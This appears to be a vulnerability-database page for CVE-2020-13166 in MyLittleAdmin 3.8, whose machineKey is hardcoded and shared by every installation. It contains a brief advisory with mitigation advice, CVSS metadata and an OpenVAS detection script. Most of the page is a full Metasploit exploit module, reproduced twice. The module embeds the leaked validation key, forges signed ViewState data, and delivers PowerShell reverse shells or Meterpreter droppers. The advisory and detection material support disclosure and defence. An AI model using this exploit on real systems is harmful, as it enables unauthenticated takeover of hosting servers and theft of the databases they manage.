Description
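The management tool in MyLittleAdmin 3.8 allows remote, unauthenticated attackers to execute arbitrary code because the ASP.NET machineKey in web.config is hardcoded (the same for all customers' installations). Anyone who knows the shared key can sign serialized ASP.NET data (a forged ViewState) that the server accepts as authentic and then deserializes. The related scanner entry on this page lists no vendor fix as of 9 June 2020, so affected installations should replace the shipped machineKey values with randomly generated per-installation ones and restrict network access to the management interface.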
Affected Software
Related
{"id": "CVE-2020-13166", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-13166", "description": "The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.", "published": "2020-05-19T20:15:00", "modified": "2022-04-26T19:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13166", "reporter": "cve@mitre.org", "references": ["https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", "http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html"], "cvelist": ["CVE-2020-13166"], "immutableFields": [], "lastseen": "2022-04-26T22:15:35", "viewCount": 162, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:62ACA1A2-F48C-4702-9D23-1D94F589D05B"]}, {"type": "openvas", "idList": 
["OPENVAS:1361412562310144088"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157808"]}, {"type": "zdt", "idList": ["1337DAY-ID-34477"]}]}, "score": {"value": 7.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:62ACA1A2-F48C-4702-9D23-1D94F589D05B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310144088"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157808"]}, {"type": "zdt", "idList": ["1337DAY-ID-34477"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "mylittletools mylittleadmin", "version": 3}]}, "vulnersScore": 7.1}, "_state": {"dependencies": 1659876597, "score": 1659878424, "affected_software_major_version": 1671590614}, "_internal": {"score_hash": "295ab6020e4395a0b29efa67019e34ee"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:mylittletools:mylittleadmin:3.8"], "cpe23": ["cpe:2.3:a:mylittletools:mylittleadmin:3.8:*:*:*:*:*:*:*"], "cwe": ["CWE-798"], "affectedSoftware": [{"cpeName": "mylittletools:mylittleadmin", "version": "3.8", "operator": "eq", "name": "mylittletools mylittleadmin"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:mylittletools:mylittleadmin:3.8:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", "name": "https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html", "name": "http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"openvas": [{"lastseen": "2020-06-10T17:59:45", "description": "myLittleAdmin is prone to an unauthenticated remote code execution vulnerability.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "openvas", "title": "myLittleAdmin <= 3.8 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13166"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310144088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310144088", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:mylittletools:mylittleadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.144088\");\n script_version(\"2020-06-09T04:06:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 04:06:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-09 03:59:10 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2020-13166\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_name(\"myLittleAdmin <= 3.8 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mylittleadmin_http_detect.nasl\");\n script_mandatory_keys(\"mylittleadmin/detected\");\n\n script_tag(name:\"summary\", value:\"myLittleAdmin is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The management tool in MyLittleAdmin allows remote attackers to execute\n arbitrary code because the machineKey is hardcoded (the same for all customers' installations) in web.config,\n and can be used to send serialized ASP code.\");\n\n script_tag(name:\"affected\", value:\"myLittleAdmin version 3.8 and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 09th June, 2020.\n Information regarding this issue will be updated 
once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less_equal(version: version, test_version: \"3.8\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:15:53", "description": "The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers\u2019 installations) in web.config, and can be used to send serialized ASP code.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 21, 2020 5:50am UTC reported:\n\nMetasploit exploit module PR\u2019d [here](<https://github.com/rapid7/metasploit-framework/pull/13494>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-19T00:00:00", "type": "attackerkb", "title": 
"CVE-2020-13166", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13166"], "modified": "2020-07-30T00:00:00", "id": "AKB:62ACA1A2-F48C-4702-9D23-1D94F589D05B", "href": "https://attackerkb.com/topics/DoTzdzLcQ3/cve-2020-13166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-23T01:21:13", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-26T00:00:00", "type": "zdt", "title": "Plesk/myLittleAdmin - ViewState .NET Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13166"], "modified": "2020-05-26T00:00:00", 
"id": "1337DAY-ID-34477", "href": "https://0day.today/exploit/description/34477", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n # <input type=\"hidden\" name=\"__VIEWSTATEGENERATOR\" id=\"__VIEWSTATEGENERATOR\" value=\"CA0B0334\" />\n VIEWSTATE_GENERATOR = 'CA0B0334'.freeze\n\n # <machineKey\n # validationKey=\"5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF\"\n # decryptionKey=\"DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4\"\n # validation=\"SHA1\" />\n VIEWSTATE_VALIDATION_KEY =\n \"\\x5c\\x7e\\xef\\x66\\x50\\x63\\x9d\\x2c\\xb8\\xfa\\xa0\\xda\\x36\\xaf\\x24\\x45\\x2d\\xcf\" \\\n \"\\x69\\x06\\x5f\\x2e\\xdc\\x2c\\x8f\\x2f\\x44\\xc0\\x22\\x0b\\xe2\\xe5\\x88\\x9c\\xa0\\x1a\" \\\n \"\\x20\\x7f\\xc5\\xfc\\xe6\\x2d\\x1a\\x5a\\x4f\\x6d\\x24\\x10\\x72\\x22\\x61\\xe6\\xa3\\x3e\" \\\n \"\\x77\\xe0\\x62\\x8b\\x17\\xaa\\x92\\x80\\x39\\xbf\".freeze\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::ViewState\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',\n 'Description' => %q{\n This module exploits a ViewState .NET deserialization vulnerability in\n web-based MS SQL Server management tool myLittleAdmin, for version 3.8\n and likely older versions, due to hardcoded <machineKey> parameters in\n the web.config file for ASP.NET.\n\n Popular web hosting control panel Plesk offers myLittleAdmin as an\n optional component that is selected automatically during \"full\"\n installation. 
This exploit caters to the Plesk target, though it\n should work fine against a standalone myLittleAdmin setup.\n\n Successful exploitation results in code execution as the user running\n myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as\n the \"SQL Admin MSSQL anonymous account.\"\n\n Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.\n },\n 'Author' => [\n # Reported to SSD (SecuriTeam) by an anonymous researcher\n # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam)\n 'Spencer McIntyre', # Inspiration\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-13166'],\n ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],\n ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']\n ],\n 'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n ],\n [\n 'Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n [\n 'PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'WfsDelay' => 10 # First exploit attempt may be a little slow\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),\n 
OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')\n return CheckCode::Unknown('Target is not running myLittleAdmin.')\n end\n\n vprint_good(\"myLittleAdmin is running at #{full_uri}\")\n check_viewstate(res.get_html_document)\n end\n\n def check_viewstate(html)\n viewstate = html.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text\n\n unless viewstate\n return CheckCode::Detected(\"__VIEWSTATE not found, can't complete check.\")\n end\n\n @viewstate_generator =\n html.at('//input[@id = \"__VIEWSTATEGENERATOR\"]/@value')&.text\n\n unless @viewstate_generator\n print_warning('__VIEWSTATEGENERATOR not found, using known default value')\n @viewstate_generator = VIEWSTATE_GENERATOR\n end\n\n # ViewState generator needs to be a packed integer now\n @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')\n\n we_can_sign_viewstate = can_sign_viewstate?(\n viewstate,\n extra: @viewstate_generator,\n key: VIEWSTATE_VALIDATION_KEY\n )\n\n if we_can_sign_viewstate\n return CheckCode::Vulnerable('We can sign our own ViewState.')\n end\n\n CheckCode::Safe(\"We can't sign our own ViewState.\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Serializing command: 
#{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_post' => {\n # This is the only parameter we need for successful exploitation!\n '__VIEWSTATE' => generate_viewstate_payload(\n cmd,\n extra: @viewstate_generator,\n key: VIEWSTATE_VALIDATION_KEY\n )\n }\n )\n\n unless res && res.code == 302 && res.redirection.path == '/error/index.html'\n fail_with(Failure::PayloadFailed, \"Could not execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34477", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-05-26T01:49:33", "description": "", "cvss3": {}, "published": "2020-05-22T00:00:00", "type": "packetstorm", "title": "Plesk / myLittleAdmin ViewState .NET Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-13166"], "modified": "2020-05-22T00:00:00", "id": "PACKETSTORM:157808", "href": "https://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \n# <input type=\"hidden\" name=\"__VIEWSTATEGENERATOR\" id=\"__VIEWSTATEGENERATOR\" value=\"CA0B0334\" /> \nVIEWSTATE_GENERATOR = 'CA0B0334'.freeze \n \n# <machineKey \n# validationKey=\"5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF\" \n# decryptionKey=\"DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4\" \n# validation=\"SHA1\" /> \nVIEWSTATE_VALIDATION_KEY = \n\"\\x5c\\x7e\\xef\\x66\\x50\\x63\\x9d\\x2c\\xb8\\xfa\\xa0\\xda\\x36\\xaf\\x24\\x45\\x2d\\xcf\" \\ 
\n\"\\x69\\x06\\x5f\\x2e\\xdc\\x2c\\x8f\\x2f\\x44\\xc0\\x22\\x0b\\xe2\\xe5\\x88\\x9c\\xa0\\x1a\" \\ \n\"\\x20\\x7f\\xc5\\xfc\\xe6\\x2d\\x1a\\x5a\\x4f\\x6d\\x24\\x10\\x72\\x22\\x61\\xe6\\xa3\\x3e\" \\ \n\"\\x77\\xe0\\x62\\x8b\\x17\\xaa\\x92\\x80\\x39\\xbf\".freeze \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::ViewState \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization', \n'Description' => %q{ \nThis module exploits a ViewState .NET deserialization vulnerability in \nweb-based MS SQL Server management tool myLittleAdmin, for version 3.8 \nand likely older versions, due to hardcoded <machineKey> parameters in \nthe web.config file for ASP.NET. \n \nPopular web hosting control panel Plesk offers myLittleAdmin as an \noptional component that is selected automatically during \"full\" \ninstallation. This exploit caters to the Plesk target, though it \nshould work fine against a standalone myLittleAdmin setup. \n \nSuccessful exploitation results in code execution as the user running \nmyLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as \nthe \"SQL Admin MSSQL anonymous account.\" \n \nTested on the latest Plesk Obsidian with optional myLittleAdmin 3.8. 
\n}, \n'Author' => [ \n# Reported to SecuriTeam SSD by an anonymous researcher \n# Reference exploit written by said anonymous researcher \n# Publicly disclosed by Noam Rathaus of SecuriTeam's SSD \n'Spencer McIntyre', # Inspiration \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-13166'], \n['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'], \n['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw'] \n], \n'DisclosureDate' => '2020-05-15', # SecuriTeam SSD advisory \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n], \n[ \n'Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n], \n[ \n'PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'SSL' => true, \n'WfsDelay' => 10 # First exploit attempt may be a little slow \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless res \nreturn CheckCode::Unknown('Target 
did not respond to check request.') \nend \n \nunless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server') \nreturn CheckCode::Unknown('Target is not running myLittleAdmin.') \nend \n \nvprint_good(\"myLittleAdmin is running at #{full_uri}\") \ncheck_viewstate(res.get_html_document) \nend \n \ndef check_viewstate(html) \nviewstate = html.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text \n \nunless viewstate \nreturn CheckCode::Detected(\"__VIEWSTATE not found, can't complete check.\") \nend \n \n@viewstate_generator = \nhtml.at('//input[@id = \"__VIEWSTATEGENERATOR\"]/@value')&.text \n \nunless @viewstate_generator \nprint_warning('__VIEWSTATEGENERATOR not found, using known default value') \n@viewstate_generator = VIEWSTATE_GENERATOR \nend \n \n# ViewState generator needs to be a packed integer now \n@viewstate_generator = [@viewstate_generator.to_i(16)].pack('V') \n \nwe_can_sign_viewstate = can_sign_viewstate?( \nviewstate, \nextra: @viewstate_generator, \nkey: VIEWSTATE_VALIDATION_KEY \n) \n \nif we_can_sign_viewstate \nreturn CheckCode::Vulnerable('We can sign our own ViewState.') \nend \n \nCheckCode::Safe(\"We can't sign our own ViewState.\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Serializing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'vars_post' => { \n# This is the only parameter we need for successful exploitation! 
\n'__VIEWSTATE' => generate_viewstate_payload( \ncmd, \nextra: @viewstate_generator, \nkey: VIEWSTATE_VALIDATION_KEY \n) \n} \n) \n \nunless res && res.code == 302 && res.redirection.path == '/error/index.html' \nfail_with(Failure::PayloadFailed, \"Could not execute command: #{cmd}\") \nend \n \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157808/plesk_mylittleadmin_viewstate.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}